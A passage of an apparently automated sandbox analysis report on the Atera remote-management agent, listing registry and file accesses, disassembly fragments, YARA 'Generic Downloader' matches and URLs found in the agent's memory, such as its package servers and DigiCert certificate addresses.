                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-CheckSumValid.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Format-FileSize.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariableNames.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariable.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyUnzip.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyWebFile.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B3D1FFFh12_2_00007FFD9B3D1FAC
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B3D1873h12_2_00007FFD9B3D172D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B3D1A44h12_2_00007FFD9B3D1A34
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B414ECBh16_2_00007FFD9B414C41
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B42B972h16_2_00007FFD9B42B5E7
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B42B972h16_2_00007FFD9B42B620
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B414ECBh16_2_00007FFD9B414E45
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then dec eax16_2_00007FFD9B62EB4D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B62FB5Ah16_2_00007FFD9B62F74C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B6359E0h16_2_00007FFD9B635739
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then dec eax16_2_00007FFD9B632DC3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then dec eax16_2_00007FFD9B634454
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then dec eax16_2_00007FFD9B634421
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B637F39h16_2_00007FFD9B637E34
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B411873h16_2_00007FFD9B410C7D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B41227Bh16_2_00007FFD9B410C7D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B6306E6h16_2_00007FFD9B62FC9D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B3D4ECBh26_2_00007FFD9B3D4C41
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B3EC1A2h26_2_00007FFD9B3EBE46
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B3D4ECBh26_2_00007FFD9B3D4E45
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B3EC1A2h26_2_00007FFD9B3EBE50
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then dec eax26_2_00007FFD9B5F1B64
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B5F2AC0h26_2_00007FFD9B5F2819
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B5F4439h26_2_00007FFD9B5F4334
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then dec eax26_2_00007FFD9B5F1B31
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B3D1873h26_2_00007FFD9B3D0C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFD9B3D227Bh26_2_00007FFD9B3D0C58

                                Networking

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.119.152.241 443
                                Yara detected Generic Downloader
                                Source: Yara matchFile source: 50.2.AgentPackageTicketing.exe.277dfbb0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.0.AgentPackageAgentInformation.exe.167d1430000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 60.2.AgentPackageProgramManagement.exe.2c3a4d10000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, type: DROPPED
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.AVAILABILITY/0.16/AGENT.PACKAGE.AVAILABILITY.Z
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.WATCHDOG/1.9/AGENT.PACKAGE.WATCHDOG.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEADREMOTE/6.0/AGENTPACKAGEADREMOTE.ZIP
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEAGENTINFORMATION/38.3/AGENTPACKAGEAGENTINFORMATI
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMARKETPLACE/1.6/AGENTPACKAGEMARKETPLACE.ZIP
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMONITORING/37.8/AGENTPACKAGEMONITORING.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEPROGRAMMANAGEMENT/26.5/AGENTPACKAGEPROGRAMMANAGE
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGERUNTIMEINSTALLER/1.6/AGENTPACKAGERUNTIMEINSTALLE
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESTREMOTE/24.3/AGENTPACKAGESTREMOTE.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESYSTEMTOOLS/27.11/AGENTPACKAGESYSTEMTOOLS.ZIP
                                Source: AgentPackageSTRemote.exe, 00000023.00000002.3066742035.0000015421762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a6dc35606b2c6816e.awsglobalaccelerator.com
                                Source: AteraAgent.exe, 0000000C.00000000.1914378345.0000016E73872000.00000002.00000001.01000000.0000000F.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80001000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B51FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acontrol.atera.com/
                                Source: rundll32.exe, 00000004.00000002.1890578145.0000000005135000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802C2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.0000000004505000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2186817722.00000167D1EE8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2186704723.00000280BB2A8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBFD1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBEBF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF59000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D723470000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A96B8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000039.00000002.2736724893.000001AA4BA19000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.0000000004A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://agent-api.atera.com
                                Source: AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277E00F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.nuget.org
                                Source: rundll32.exe, 00000004.00000002.1890578145.0000000005135000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802C2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.0000000004505000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2186817722.00000167D1EE8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2186704723.00000280BB2A8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBFD1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBEBF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF59000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D723470000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A96B8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000039.00000002.2736724893.000001AA4BA19000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.0000000004A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://atera-agent-api-eu.westeurope.cloudapp.azure.com
                                Source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2941460212.000001AF0013C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blob.ams08prdstr06a.store.core.windows.net
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABC1000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7C8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526ED000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AC34000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE807B8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80682000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802D2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802C2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A7F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526C7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B527FF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                                Source: AteraAgent.exe, 0000000C.00000002.1975925687.0000016E760AA000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB9F0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBF00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB970000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE17000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB97C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBE7E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDFE000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE07000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7E7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBF00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBEF2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE07000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABEF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526ED000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AC34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
